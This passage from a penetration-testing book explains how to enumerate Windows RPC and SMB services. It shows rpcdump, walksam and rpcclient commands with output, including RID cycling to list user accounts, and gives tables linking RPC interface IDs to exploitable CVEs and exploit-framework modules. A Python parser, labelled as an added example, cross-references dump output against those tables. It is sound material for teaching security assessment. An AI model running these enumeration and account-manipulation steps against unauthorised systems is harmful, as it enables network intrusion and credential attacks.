This chapter focuses on Microsoft RPC, NetBIOS, and CIFS services that are used in large internal networks to support file sharing, printing, and other functions. If these services aren’t configured or protected properly by network filtering devices, they can be used to great effect to enumerate system details and cause a complete network compromise.
Microsoft Windows networking services use the following ports:
loc-srv       135/tcp
loc-srv       135/udp
netbios-ns    137/udp
netbios-dgm   138/udp
netbios-ssn   139/tcp
microsoft-ds  445/tcp
microsoft-ds  445/udp
TCP and UDP port 135 are used for RPC endpoint mapping and client-server communication; TCP ports 139 and 445 carry SMB sessions, which provide authentication, file sharing, and named pipe access; and UDP ports 137 and 138 are used for local NetBIOS naming, browsing, and lookup functions.
The Server Message Block (SMB) protocol facilitates resource sharing in Microsoft Windows environments. Under Windows NT, SMB runs over NetBIOS over TCP/IP (NBT), using UDP ports 137 and 138 and TCP port 139. Windows 2000 and later also support direct-hosted SMB, commonly referred to as Common Internet File System (CIFS), which provides full SMB access through TCP port 445 alone (port 445 is also registered for UDP, but SMB sessions use TCP). Many system administrators diligently filter access to ports 135 through 139 but neglect port 445 when protecting Windows 2000, XP, 2003, and Vista hosts, leaving file sharing, named pipes, and the RPC interfaces behind them reachable.
The Microsoft RPC endpoint mapper (also known as the DCE locator service) listens on both TCP and UDP port 135, and works much like the Sun RPC portmapper service found in Unix environments. Examples of Microsoft applications and services that use port 135 for endpoint mapping include Outlook, Exchange, and the Messenger Service.
Depending on the host configuration, the RPC endpoint mapper can be reached in three ways: directly through TCP and UDP port 135; over SMB, through the \pipe\epmapper named pipe, with a null or authenticated session on TCP port 139 or 445; and as RPC over HTTP on TCP port 593. For more information, see Todd Sabin’s presentation titled “Windows 2000, NULL Sessions and MSRPC.” Look for it at http://www.bindview.com/services/razor/resources/nullsess.ppt.
Assessment of RPC services includes the following:
Enumerating accessible RPC server interfaces and information gathering
Identifying vulnerable RPC server interfaces and components
Gleaning user and system details through LSA service interfaces (including SAMR and LSARPC)
Brute-forcing user passwords through the DCOM WMI subsystem
Executing commands through the Task Scheduler service
Starting services through the Server service
Following is a breakdown of these tasks, along with details of respective tools and techniques.
Through the RPC endpoint mapper, you can enumerate IP addresses of network interfaces (which will sometimes reveal internal network information), along with details of RPC services using dynamic high ports. The following tools can mine information from the endpoint mapper:
epdump is a Microsoft command-line utility found in the Microsoft Windows Resource Kit. Example 10-1 uses epdump to query the RPC endpoint mapper running on 192.168.189.1 (through TCP port 135).
C:\> epdump 192.168.189.1
binding is 'ncacn_ip_tcp:192.168.189.1'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:192.168.0.1[1028]
annot 'Messenger Service'
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncalrpc:[ntsvcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\ntsvcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\scerpc]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncalrpc:[DNSResolver]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:62.232.8.1[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:192.168.170.1[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:192.168.189.1[1028]
annot 'Messenger Service'
no more entries
The responses to this query show that the NetBIOS name of the host is WEBSERV, and that there are four network interfaces with the following IP addresses:
62.232.8.1
192.168.0.1
192.168.170.1
192.168.189.1
Analysis of the RPC services that are running reveals that the Messenger Service is accessible through UDP port 1028, along with two named pipes: \PIPE\ntsvcs and \PIPE\scerpc. Named pipes are accessible through SMB upon authenticating with the NetBIOS session or CIFS services.
Servers running Microsoft Exchange return many details of subsystems that are run as RPC services, and so hundreds of results are returned when using tools such as epdump and rpcdump. The useful information includes details of internal network interfaces and RPC services running on high dynamic ports, which you can use to clarify port scan results.
Many of the RPC services listed through epdump don’t have a plaintext annotation (as the Messenger service does in Example 10-1). An example of an accessible RPC service listed without annotation is as follows:
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
From this information you can see that this is an RPC endpoint accessible through TCP port 1025 on 192.168.189.1, but there is only a 128-bit value (a UUID, written as a hex string) to identify the service. This value is known as the interface ID (IFID).
Todd Sabin wrote two Windows utilities (rpcdump and ifids), used to query the RPC endpoint mapper using specific protocol sequences and to query specific RPC endpoints directly. The rpcdump tool can enumerate RPC service information through various protocol sequences. Its usage is as follows:
rpcdump [-v] [-p protseq] target
One of four protocol sequences can be used to access the RPC endpoint mapper, as follows:
ncacn_np (the \pipe\epmapper named pipe through SMB)
ncacn_ip_tcp (direct access to TCP port 135)
ncadg_ip_udp (direct access to UDP port 135)
ncacn_http (RPC over HTTP on TCP port 80, 593, or others)
The -v option enables verbosity, so that rpcdump also connects to each registered endpoint and enumerates all of the RPC interfaces registered there. The -p option specifies a particular protocol sequence to use when talking to the endpoint mapper; if none is specified, rpcdump tries all four protocol sequences.
rpcdump can be run much like epdump from the command line to dump details of network interfaces, IP addresses, and RPC servers. Example 10-2 shows rpcdump running to list all registered RPC endpoints through TCP port 135.
D:\rpctools> rpcdump 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
Using the verbose flag, you can walk and enumerate all IFID values for each registered endpoint. First, port 135 is queried, followed by each registered endpoint (UDP port 1028, TCP port 1025, etc.). Example 10-3 shows rpcdump used in this way to fully list all registered RPC endpoints and interfaces.
D:\rpctools> rpcdump -v 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
RpcMgmtInqIfIds succeeded
Interfaces: 16
367abb81-9844-35f1-ad32-98f038001003 v2.0
93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
6bffd098-a112-3610-9833-46c3f87e345a v1.0
8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
6bffd098-a112-3610-9833-012892020162 v0.0
17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
RpcMgmtInqIfIds succeeded
Interfaces: 2
1ff70682-0a51-30e8-076d-740be8cee98b v1.0
378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
If you can’t connect to the endpoint mapper through TCP port 135, use UDP port 135 to enumerate registered RPC endpoints with the -p ncadg_ip_udp option, as shown in Example 10-4.
D:\rpctools> rpcdump -p ncadg_ip_udp 192.168.189.1
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncalrpc:[LRPC00000290.00000001]
IfId: 1ff70682-0a51-30e8-076d-740be8cee98b version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_ip_tcp:192.168.0.1[1025]
The ifids utility queries specific RPC endpoints (such as UDP port 1028 or TCP port 1025) to identify the interfaces accessible there. A practical application of ifids is to enumerate RPC services running on high ports when the RPC endpoint mapper itself isn’t accessible (for example, when port 135 is filtered but the dynamic ports are not). The ifids usage is:
ifids [-p protseq] [-e endpoint] target
The -p option specifies which protocol sequence to use when talking to the server, and the -e option specifies which endpoint (port) to connect to. In Example 10-5, I use ifids to connect to TCP port 1025 and list the accessible interfaces.
D:\rpctools> ifids -p ncacn_ip_tcp -e 1025 192.168.189.1
Interfaces: 2
1ff70682-0a51-30e8-076d-740be8cee98b v1.0
378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
By referring to the list of known IFID values, you can see that these two interfaces are Microsoft Task Scheduler (mstask.exe) listeners. Example 10-6 shows how to use the ifids tool to enumerate the IFID values of RPC services accessible through UDP port 1028.
D:\rpctools> ifids -p ncadg_ip_udp -e 1028 192.168.189.1
Interfaces: 16
367abb81-9844-35f1-ad32-98f038001003 v2.0
93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0
82273fdc-e32a-18c3-3f78-827929dc23ea v0.0
65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0
8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
6bffd098-a112-3610-9833-46c3f87e345a v1.0
8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0
c9378ff1-16f7-11d0-a0b2-00aa0061426a v1.0
0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0
4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
300f3532-38cc-11d0-a3f0-0020af6b0add v1.2
6bffd098-a112-3610-9833-012892020162 v0.0
17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0
8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0
Urity (http://www.securityfriday.com) wrote a graphical Windows version of the rpcdump tool called RpcScan. In the same way that rpcdump -v works, RpcScan queries each registered RPC endpoint and enumerates all of the IFID values. Urity spent time researching IFID values and their idiosyncrasies, and references them in the RpcScan output. Figure 10-1 shows the tool in use against 192.168.189.1.
Upon enumerating accessible RPC endpoints and associated IFID values, it is necessary to cross-reference them with known Microsoft RPC service issues, and further test them using exploitation frameworks and similar tools. Table 10-1 lists IFID values that have known remotely exploitable issues, as found in MITRE CVE. Table 10-2 lists other useful IFID values that can be used to enumerate users, perform password grinding, and execute commands.
Table 10-1. IFID values with known remotely exploitable issues (MITRE CVE)

IFID                                 | Service details                                   | CVE reference(s)
12345678-1234-abcd-ef00-0123456789ab | Print spooler service                             | CVE-2005-1984
17fdd703-1827-4e34-79d4-24a55c53bb37 | Messenger service                                 | CVE-2003-0717
2f5f3220-c126-1076-b549-074d078619da | NetDDE service                                    | CVE-2004-0206
2f5f6520-ca46-1067-b319-00dd010662da | Telephony service                                 | CVE-2005-0058
342cfd40-3c6c-11ce-a893-08002b2e9c6d | License Logging Service (LLSSRV) interface        | CVE-2005-0050
3919286a-b10c-11d0-9ba8-00c04fd92ef5 | LSASS interface                                   | CVE-2003-0533
4b324fc8-1670-01d3-1278-5a47bf6ee188 | Server service                                    | CVE-2005-0051, CVE-2006-3439
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | DCOM interface                                    | CVE-2003-0352, CVE-2003-0528, CVE-2003-0715, CVE-2004-0124
50abc2a4-574d-40b3-9d66-ee4fd5fba076 | DNS server service                                | CVE-2007-1748
5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc | Messenger service                                 | CVE-2003-0717
6bffd098-a112-3610-9833-46c3f87e345a | Workstation service                               | CVE-2003-0812, CVE-2006-4691
8d9f4e40-a03d-11ce-8f69-08003e30051b | Plug and Play service                             | CVE-2005-1983, CVE-2005-2120
8f09f000-b7ed-11ce-bbd2-00001a181cad | Remote Access Service Manager (RASMAN) interface  | CVE-2006-2370, CVE-2006-2371
c8cb7687-e6d3-11d2-a958-00c04f682e16 | WebDAV client service                             | CVE-2006-0013
d6d70ef0-0e3b-11cb-acc3-08002b1d29c3 | RPC locator service                               | CVE-2003-0003
e67ab081-9844-3521-9d32-834f038001c0 | Client service for NetWare                        | CVE-2005-1985, CVE-2006-4688
e1af8308-5d1f-11c9-91a4-08002b14a0fa | RPC endpoint mapper                               | CVE-2002-1561
fdb3a030-065f-11d1-bb9b-00a024ea5525 | Message Queuing (MQ) and MSDTC services           | CVE-2005-0059, CVE-2005-2119, CVE-2006-0034, CVE-2006-1184
Table 10-2. Other useful IFID values for enumeration, password grinding, and command execution

IFID                                 | Service comments
12345778-1234-abcd-ef00-0123456789ab | LSA interface, used to enumerate users
12345778-1234-abcd-ef00-0123456789ac | LSA SAMR interface, used to access the public components of the SAM database, including usernames
1ff70682-0a51-30e8-076d-740be8cee98b | Task scheduler, used to remotely execute commands (with a valid username/password)
338cd001-2244-31f1-aaaa-900038001003 | Remote registry service, used to remotely access and modify the system registry (depending on permissions and access rights)
4b324fc8-1670-01d3-1278-5a47bf6ee188 | Server service, used to remotely start and stop services on the host
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | DCOM WMI interface, used for brute-force password grinding and information gathering
If administrative credentials are known (such as the Administrator account password), the LSA and SAMR interfaces can be used to add users and elevate rights and privileges accordingly. These commands and issues are discussed in the following sections.
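The cross-referencing step described above, worked through as an added example (this is not code from epdump, rpcdump, ifids or the rpctools package): a small parser that reads epdump output, rpcdump output (with or without -v) and bare ifids output, collects the network interface addresses, dynamic ports, NetBIOS names and named pipes an assessor wants from a dump, and flags any IFID that appears in a hand-typed subset of Tables 10-1 and 10-2. The KNOWN_IFIDS table is deliberately partial, and the sample dumps are constructed from lines of Examples 10-1 and 10-3 (trimmed) so the script runs offline.

```python
"""Parse endpoint-mapper dumps (epdump, rpcdump, rpcdump -v, ifids) and
cross-reference the IFIDs found against a table of known interfaces.
Added example, not part of rpctools or the Resource Kit: the parser and the
KNOWN_IFIDS subset are constructed here; samples reproduce Examples 10-1/10-3."""
import re

# Hand-typed subset of Tables 10-1 and 10-2: IFID -> (service, CVE references).
KNOWN_IFIDS = {
    "5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc": ("Messenger service", ["CVE-2003-0717"]),
    "4b324fc8-1670-01d3-1278-5a47bf6ee188": ("Server service", ["CVE-2005-0051", "CVE-2006-3439"]),
    "6bffd098-a112-3610-9833-46c3f87e345a": ("Workstation service", ["CVE-2003-0812", "CVE-2006-4691"]),
    "8d9f4e40-a03d-11ce-8f69-08003e30051b": ("Plug and Play service", ["CVE-2005-1983", "CVE-2005-2120"]),
    "1ff70682-0a51-30e8-076d-740be8cee98b": ("Task scheduler", []),
    "12345778-1234-abcd-ef00-0123456789ac": ("LSA SAMR interface", []),
}

UUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
IFID_RE = re.compile(rf"^(?:int|IfId:)\s+({UUID})\s+v(?:ersion\s+)?([\d.]+)$", re.I)  # epdump / rpcdump
BARE_RE = re.compile(rf"^({UUID})\s+v([\d.]+)$", re.I)      # rpcdump -v (RpcMgmtInqIfIds) and ifids lines
BIND_RE = re.compile(r"^binding:?\s+(?:[0-9a-f-]+@)?([a-z_]+):(.*)$", re.I)  # [objuuid@]protseq:endpoint
ANNOT_RE = re.compile(r"^(?:annot\s+'(.*)'|Annotation:\s*(.*))$")
EP_RE = re.compile(r"^(?P<host>[^\[]*)\[(?P<ep>[^\]]*)\]$")  # host[port], \\HOST[\PIPE\x], [LRPC..]


def parse_dump(text):
    """One record per registered endpoint, plus the IFIDs RpcMgmtInqIfIds
    reported as reachable through it; 'loose' holds bare IFIDs seen before
    any endpoint header (plain ifids output)."""
    records, loose, current = [], [], None
    for line in map(str.strip, text.splitlines()):
        if m := IFID_RE.match(line):
            current = {"ifid": m.group(1).lower(), "version": m.group(2), "protseq": None,
                       "host": "", "endpoint": "", "annot": "", "reachable": []}
            records.append(current)
        elif m := BARE_RE.match(line):
            (current["reachable"] if current else loose).append(m.group(1).lower())
        elif current is None:
            continue                      # e.g. epdump's "binding is 'ncacn_ip_tcp:...'" header
        elif m := BIND_RE.match(line):
            current["protseq"] = m.group(1).lower()
            ep = EP_RE.match(m.group(2).strip())
            current["host"] = ep.group("host") if ep else m.group(2).strip()
            current["endpoint"] = ep.group("ep") if ep else ""
        elif m := ANNOT_RE.match(line):
            current["annot"] = (m.group(1) or m.group(2) or "").strip()
    return records, loose


def _ipkey(host):
    """Sort dotted-quad hosts numerically (ncacn_ip_tcp/ncadg_ip_udp bindings carry IPs)."""
    return tuple(int(o) for o in host.split("."))


def summarize(records, loose=()):
    """What an assessor wants from a dump: interface addresses (internal ranges
    leak here), dynamic ports to reconcile with a port scan, NetBIOS names and
    named pipes, and any IFID with a known issue."""
    ip_recs = [r for r in records if r["protseq"] in ("ncacn_ip_tcp", "ncadg_ip_udp")]
    np_recs = [r for r in records if r["protseq"] == "ncacn_np"]
    seen = {r["ifid"] for r in records} | set(loose)
    for r in records:
        seen.update(r["reachable"])
    return {
        "ips": sorted({r["host"] for r in ip_recs}, key=_ipkey),
        "ports": sorted({(r["protseq"], int(r["endpoint"])) for r in ip_recs}),
        "names": sorted({r["host"].strip("\\") for r in np_recs}),
        "pipes": sorted({r["endpoint"] for r in np_recs}),
        "known": {i: KNOWN_IFIDS[i] for i in sorted(seen) if i in KNOWN_IFIDS},
    }


# Constructed samples: lines taken from Example 10-1 (epdump) and 10-3 (rpcdump -v, trimmed).
SAMPLE_EPDUMP = r"""
binding is 'ncacn_ip_tcp:192.168.189.1'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncadg_ip_udp:192.168.0.1[1028]
annot 'Messenger Service'
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:62.232.8.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-000000000000@ncacn_np:\\WEBSERV[\PIPE\ntsvcs]
annot 'Messenger Service'
no more entries
"""
SAMPLE_RPCDUMP_V = """
IfId: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:192.168.189.1[1028]
RpcMgmtInqIfIds succeeded
Interfaces: 3
6bffd098-a112-3610-9833-46c3f87e345a v1.0
4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0
"""

if __name__ == "__main__":
    for tool, dump in (("epdump", SAMPLE_EPDUMP), ("rpcdump -v", SAMPLE_RPCDUMP_V)):
        print(f"== {tool} ==")
        for key, value in summarize(*parse_dump(dump)).items():
            print(f"{key:>6}: {value}")
```

Feed it a saved dump with `summarize(*parse_dump(open("dump.txt").read()))`; the "known" entries are the IFIDs to take to Table 10-3 and an exploitation framework, and the "ports" list is what to reconcile against your port scan of the same host.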
I only cover Microsoft RPC endpoints with significant security implications here. Jean-Baptiste Marchand has assembled an excellent series of documents that cover Microsoft RPC interfaces and named pipe endpoints. His “Windows network services internals” page should be reviewed for current up-to-date details of Microsoft RPC issues, accessible at http://www.hsc.fr/ressources/articles/win_net_srv/.
A number of remotely exploitable RPC interface issues have been publicized over recent years, as listed in Table 10-3.
Table 10-3. Remotely exploitable RPC interface issues and exploit framework support (✓ = module available in IMPACT, CANVAS, or Metasploit Framework)

CVE reference(s)                | Advisory | Notes                                                          | IMPACT | CANVAS | MSF
CVE-2007-1748                   | MS07-029 | DNS server service interface zone name overflow                | ✓      | ✓      | ✓
CVE-2006-4691                   | MS06-070 | Workstation service overflow                                   | ✓      | ✓      |
CVE-2006-4688                   | MS06-066 | Microsoft NetWare client service overflow                      | ✓      | ✓      | ✓
CVE-2006-3439                   | MS06-040 | Server service overflow                                        | ✓      | ✓      | ✓
CVE-2006-2371                   | MS06-025 | Remote Access Service Manager (RASMAN) registry corruption     | ✓      | ✓      |
CVE-2006-2370                   | MS06-025 | Routing and Remote Access Service (RRAS) memory corruption     | ✓      | ✓      | ✓
CVE-2005-1985                   | MS05-046 | Microsoft NetWare client service overflow                      | ✓      | ✓      |
CVE-2005-1984                   | MS05-043 | Print spooler service overflow                                 | ✓      | ✓      |
CVE-2005-1983                   | MS05-039 | Plug and Play service overflow                                 | ✓      | ✓      | ✓
CVE-2005-0059                   | MS05-017 | Message Queuing (MSMQ) RPC overflow                            | ✓      | ✓      | ✓
CVE-2005-0058                   | MS05-040 | Telephony service overflow                                     | ✓      | ✓      |
CVE-2005-0050                   | MS05-010 | License Logging Service (LLSSRV) overflow                      | ✓      | ✓      |
CVE-2004-0206                   | MS04-031 | NetDDE service overflow                                        | ✓      | ✓      | ✓
CVE-2003-0818                   | MS04-007 | Local Security Authority Subsystem Service (LSASS) ASN.1 overflow | ✓   | ✓      | ✓
CVE-2003-0812                   | MS03-049 | Workstation service overflow                                   | ✓      | ✓      | ✓
CVE-2003-0717                   | MS03-043 | Messenger service overflow                                     | ✓      | ✓      |
CVE-2003-0715 and CVE-2003-0528 | MS03-039 | DCOM interface heap overflows                                  | ✓      |        |
CVE-2003-0533                   | MS04-011 | Local Security Authority Subsystem Service (LSASS) overflow    | ✓      | ✓      | ✓
CVE-2003-0352                   | MS03-026 | DCOM interface stack overflow                                  | ✓      | ✓      | ✓
CVE-2003-0003                   | MS03-001 | RPC locator service overflow                                   | ✓      | ✓      |
A number of these issues, including CVE-2006-3439 (Server service overflow) and CVE-2003-0533 (LSASS overflow) are also exploitable through named pipes, depending on configuration and network filtering, accessible via NetBIOS (TCP port 139) and CIFS (TCP port 445). CVE-2003-0818 is exploitable through any mechanism supporting NTLM authentication, including NetBIOS (SMB), HTTP, and SMTP.
A number of RPC queries can be issued to accessible LSARPC and SAMR RPC service endpoints (running over TCP, UDP, HTTP, or named pipes). Named pipes access is provided across SMB sessions, accessible via the NetBIOS session service (TCP port 139), and CIFS service (TCP port 445).
The walksam utility (found in Todd Sabin’s rpctools package) queries the SAMR named pipe interface (\pipe\samr) to glean user information. Example 10-7 shows walksam being used across a local Windows network to walk the SAMR interface of 192.168.1.1.
D:\rpctools> walksam 192.168.1.1
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon: 8/12/2003 19:16:44.375
Last Logoff: never
Last Passwd Change: 8/13/2002 18:43:52.468
Acct. Expires: never
Allowed Passwd Change: 8/13/2002 18:43:52.468
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101
rid 501: user Guest
Userid: Guest
Description: Built-in account for guest access to the computer/domain
Last Logon: never
Last Logoff: never
Last Passwd Change: never
Acct. Expires: never
Allowed Passwd Change: never
Rid: 501
Primary Group Rid: 513
Flags: 0x215
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 0
The walksam utility also supports the additional protocol sequences used by Windows 2000 domain controllers. The SAMR interface (IFID 12345778-1234-abcd-ef00-0123456789ac) must first be found using rpcdump or a similar tool to list all the registered endpoints; it’s then accessed using walksam with the correct protocol sequence (over named pipes, TCP, UDP, or HTTP).
Windows enumeration tools, such as walksam, that use RID cycling to list users (through looking up RID 500, 501, 502, etc.) identify the administrator account, even if it has been renamed.
Example 10-8 shows walksam in use against a Windows 2000 domain controller running a SAMR interface through the ncacn_ip_tcp endpoint at TCP port 1028.
D:\rpctools> walksam -p ncacn_ip_tcp -e 1028 192.168.1.10
rid 500: user Administrator
Userid: Administrator
Description: Built-in account for administering the computer/domain
Last Logon: 8/6/2003 11:42:12.725
Last Logoff: never
Last Passwd Change: 2/11/2003 09:12:50.002
Acct. Expires: never
Allowed Passwd Change: 2/11/2003 09:12:50.002
Rid: 500
Primary Group Rid: 513
Flags: 0x210
Fields Present: 0xffffff
Bad Password Count: 0
Num Logons: 101
rpcclient (part of the Unix Samba package from http://www.samba.org) can be used to interact with RPC service endpoints across SMB and named pipes (accessible through the NetBIOS session and CIFS services). The tool has an extraordinary number of features and usage options—far too many to list here. Before using the rpcclient tool, I recommend that you review http://www.samba-tng.org/docs/tng/htmldocs/rpcclient.8.html. Table 10-4 lists the useful SAMR and LSARPC interface commands that can be issued through the rpcclient utility upon establishing an SMB session.
By default, Windows NT 4.0 and Windows 2000 systems, along with Windows Server 2003 domain controllers, allow anonymous (null session) access to SMB, so these interfaces can be queried in this way. If null session access to SMB is not permitted, a valid username and password must be provided to access the LSARPC and SAMR interfaces.
Table 10-4. Useful rpcclient commands for the SAMR and LSARPC interfaces

Command             | Interface | Description
queryuser           | SAMR      | Retrieve user information
querygroup          | SAMR      | Retrieve group information
querydominfo        | SAMR      | Retrieve domain information
enumdomusers        | SAMR      | Enumerate domain users
enumdomgroups       | SAMR      | Enumerate domain groups
createdomuser       | SAMR      | Create a domain user
deletedomuser       | SAMR      | Delete a domain user
lookupnames         | LSARPC    | Look up usernames to SID values
lookupsids          | LSARPC    | Look up SIDs to usernames (RID cycling)
lsaaddacctrights    | LSARPC    | Add rights to a user account
lsaremoveacctrights | LSARPC    | Remove rights from a user account
Example 10-9 shows rpcclient in use against a remote system at 192.168.0.25 to perform RID cycling and enumerate users through the LSARPC named pipe (\pipe\lsarpc). In this example we first look up the full SID value of the chris account, and then increment the RID value (1001 through 1007) to enumerate the other user accounts through the LSARPC interface, until a lookup fails with NT_STATUS_NONE_MAPPED.
$ rpcclient -I 192.168.0.25 -U=chris%password WEBSERV
rpcclient> lookupnames chris
chris S-1-5-21-1177238915-1563985344-1957994488-1003 (User: 1)
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1001
S-1-5-21-1177238915-1563985344-1957994488-1001 WEBSERV\IUSR_WEBSERV
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1002
S-1-5-21-1177238915-1563985344-1957994488-1002 WEBSERV\IWAM_WEBSERV
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1003
S-1-5-21-1177238915-1563985344-1957994488-1003 WEBSERV\chris
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1004
S-1-5-21-1177238915-1563985344-1957994488-1004 WEBSERV\donald
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1005
S-1-5-21-1177238915-1563985344-1957994488-1005 WEBSERV\test
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1006
S-1-5-21-1177238915-1563985344-1957994488-1006 WEBSERV\daffy
rpcclient> lookupsids S-1-5-21-1177238915-1563985344-1957994488-1007
result was NT_STATUS_NONE_MAPPED
rpcclient>
Alternatively, you can use the enumdomusers command to simply list all users through a forward lookup, as shown in Example 10-10. This technique does not work when RestrictAnonymous=1 is set on the target, in which case RID cycling must be used.
rpcclient> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[chris] rid:[0x3eb]
